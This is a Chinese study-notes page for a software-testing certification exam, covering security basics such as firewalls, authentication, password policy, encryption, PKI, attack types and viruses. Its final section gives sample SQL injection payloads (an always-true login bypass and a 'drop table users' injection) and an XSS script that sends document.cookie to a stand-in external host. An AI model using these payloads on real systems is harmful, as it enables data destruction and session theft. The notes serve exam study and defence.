IT数码 购物 网址 头条 软件 日历 阅读 图书馆
TxT小说阅读器
↓语音阅读,小说下载,古典文学↓
图片批量下载器
↓批量下载图片,美女图库↓
图片自动播放器
↓图片自动播放器↓
一键清除垃圾
↓轻轻一点,清除系统垃圾↓
开发: C++知识库 Java知识库 JavaScript Python PHP知识库 人工智能 区块链 大数据 移动开发 嵌入式 开发工具 数据结构与算法 开发测试 游戏开发 网络协议 系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程
数码: 电脑 笔记本 显卡 显示器 固态硬盘 硬盘 耳机 手机 iphone vivo oppo 小米 华为 单反 装机 图拉丁
 
   -> 网络协议 -> 软件评测师——安全性基础知识 -> 正文阅读

[网络协议]软件评测师——安全性基础知识

安全防护体系

七个层次

  1. 实体安全
  2. 平台安全
  3. 数据安全
  4. 通信安全
  5. 应用安全
  6. 运行安全
  7. 管理安全

安全保护等级(5层,等级渐强)

  1. 用户自主——用户自己具备自主的安全保护能力,如通过用户、用户组来实现(账户、密码等)
  2. 系统审计——在用户自主级的基础上增加审计跟踪日志
  3. 安全标记——在第二级基础上指定了安全标记(划分不同的安全级别,有相应的权限才可进行访问)
  4. 结构化——在第三级基础上,将安全保护机制划分为关键部分和非关键部分的类别
  5. 访问验证——增设访问验证功能

数据安全策略

备份和恢复是一种数据安全策略
  • 存储设备
    磁盘阵列、磁带机(磁带库)、光盘库、SAN设备
  • 存储优化
    DAS、NAS、SAN
  • 存储保护
    磁盘阵列、双机容错、集群、备份与恢复
  • 存储管理
    数据库备份与恢复、文件与卷管理、复制、SAN管理

安全防护策略

软件系统对抗攻击的主要手段——安全防护策略

主要策略

  • 安全日志——被动防护策略(记录行为,不会主动防护)
  • 入侵检测——防火墙的第二道闸门,主动网络安全防护措施
  • 隔离防护
    ——隔离网闸:实现内网和外网的物理隔离
    ——防火墙:实现内网和外网的逻辑隔离
  • 漏洞扫描——使用扫描工具扫描漏洞,是黑客攻击的第一步

防火墙(类型)

包过滤防火墙

  • 对用户透明
  • 安全控制能力限于网络层传输层
  • 不建立链接状态表(一直保持开启),前后报文无关
  • 应用层控制弱

状态检测防火墙

  • 建立链接状态表者(可以使用动态的端口号,可以随时关闭或开启),前后报文相关
  • 应用层控制弱

代理服务防火墙

  • 检测一些应用层的安全行为
  • 防护等级高,效率低

用户认证机制

在这里插入图片描述

访问控制

访问控制的实现方式

  • 限制访问系统的人员——用户标识与验证(是访问控制的基础,是对用户身份的合法性验证)
  • 限制进入系统的用户所能做的操作——存取控制(限制权限法,隔离技术法)

三种常用的方法

  • 要求用户输入一些保密信息
  • 采用物理识别设备
  • 采用生物统计学系统

身份验证方式

  • 用户名/密码方式
  • IC卡认证——IC卡硬件不可复制
  • 动态密码——按照时间使用次数不断变化;每个密码只使用一次的技术
  • USB Key认证——采用软硬件结合,一次一密的强双因子验证(解决了安全性与易用性矛盾

用户口令保护策略

安全密码(首次登录必须修改口令)

  • 密码长度
  • 密码有效期
  • 密码组成:大写、小写、数字、特殊符号
  • 不带联想色彩(电话、生日、地址…)
  • 不用完整的单词(常用人名Alice等)

口令保护策略

  • 最大口令时效
  • 最小口令时效(防止被攻击后别人修改密码,使得管理员丧失管理权)
  • 口令历史(设置多久才能允许使用历史密码)
  • 最小口令长度
  • 口令复杂度
  • 加密选项
  • 口令锁定

加密技术

对称性加密

加密和解密使用相同的密钥

特点

  • 密钥分发困难
  • 算法效率高
  • 速度快
  • 适合于对大数据进行加密

常见对称性算法(私钥加密算法)

  • DES 3DES(三重DES)
  • RC- 5
  • IDEA 国际数据加密算法

非对称性加密

加密和解密使用不同的密钥

特点

  • 密钥成对出现
  • 密钥之间不能相互推导
  • 公钥对外公开
  • 私钥只有持有者持有
  • 算法相对于对称加密算法效率低

常见非对称算法(公钥加密算法)

  • RSA
  • ECC椭圆曲线算法
  • Elgamal算法
  • DSA 数字签名算法

PKI

公钥基础设施——解决公钥归属问题,如A与B通信,PKI确保确实公钥来自于A/B,而不是第三方
  • CA ——证书颁发机构,是PKI的核心
  • 数字证书——把公钥和拥有者绑定在一起的数字文件
  • 证书实现的安全保证——机密性、不可否认性、完整性、鉴别

签名+加密

在这里插入图片描述

注:D——解密;E——加密
对未加密的数据进行解密,也是数据变成不可阅读的方式,也可以看做加密

单向加密

非可逆加密

  • 就是不可解密的加密方法,也称单向加密

常见的单向加密算法

  • MD5
  • SHA(安全的哈希算法)——无论数据大小,通过哈希算法生成的哈希报文摘要位数固定;数据不同,生成的哈希报文摘要也不同
    ——等同于签名功能,但是效率比签名高
Hash+签名

在这里插入图片描述

网络攻击

网络攻击术语

  • 冒充——口令猜测、缓冲区溢出
  • 重演(重复演示)
  • 消息篡改——伪造电子邮件、DNS高速缓存污染(在高速缓存中修改信息)
  • 服务拒绝(DOS,DDOS无法正常提供服务)——死亡ping、泪滴攻击、UDP洪水、SYN洪水、Land攻击、Smurf攻击、Fraggle攻击、电子邮件炸弹、畸形信息攻击

病毒防治

计算机病毒

  • 病毒破坏者——人为的,可自我复制的
    潜伏性、传染性、隐蔽性、破坏性、多样性、条件触发性
  • 木马盗窃者
    不产生图标、伪装成“系统服务”的方式、自动运行、具备自动恢复、能自动开启端口,建立网络连接

计算机病毒与木马

在这里插入图片描述

常见安全协议(了解,考察协议之间的关系)

安全协议-SSL

在这里插入图片描述
在这里插入图片描述

安全协议-HTTPS

在这里插入图片描述

SQL注入攻击、XSS攻击(重要!!!)

SQL注入攻击

strSQL= "select * from users where (name = '"+ userName + "')
and (pw = '"+ passWord"');"
strSQL = "select * from users where (name = '1' or '1' = '1') and (pw = '1' or '1'='1');"
strSQL = "select * from users where (name = '张三';drop table users ;-- );"

XSS攻击

  • 跨站脚本攻击(Cross Site Scripting)
  • 原理:攻击者向有XSS漏洞的网站中输入(或传入)恶意的HTML代码,使得用户浏览该网站是,自动执行这段恶意代码,从而达到攻击的目的。
    ——如盗取用户cookie破坏页面结构重定向其他网站
http://bbs.xss.net/home?content = <script> alert("xss")</script>
http://www.xss.com?content = <script>window.open("www.xss1.com ?param=" document.cookie)</script>

XSS防御

  • 验证所有输入数据,有效检测攻击
  • 对所有输出数据进行适当的编码,以防止任何已成功注入的脚本在浏览器端运行
  网络协议 最新文章
使用Easyswoole 搭建简单的Websoket服务
常见的数据通信方式有哪些?
Openssl 1024bit RSA算法---公私钥获取和处
HTTPS协议的密钥交换流程
《小白WEB安全入门》03. 漏洞篇
HttpRunner4.x 安装与使用
2021-07-04
手写RPC学习笔记
K8S高可用版本部署
mySQL计算IP地址范围
上一篇文章           查看所有文章
加:2022-09-30 01:21:54  更:2022-09-30 01:24:06 
 
开发: C++知识库 Java知识库 JavaScript Python PHP知识库 人工智能 区块链 大数据 移动开发 嵌入式 开发工具 数据结构与算法 开发测试 游戏开发 网络协议 系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程
数码: 电脑 笔记本 显卡 显示器 固态硬盘 硬盘 耳机 手机 iphone vivo oppo 小米 华为 单反 装机 图拉丁

360图书馆 购物 三丰科技 阅读网 日历 万年历 2024年12日历 -2024/12/28 6:49:31-

图片自动播放器
↓图片自动播放器↓
TxT小说阅读器
↓语音阅读,小说下载,古典文学↓
一键清除垃圾
↓轻轻一点,清除系统垃圾↓
图片批量下载器
↓批量下载图片,美女图库↓
  网站联系: qq:121756557 email:121756557@qq.com  IT数码
数据统计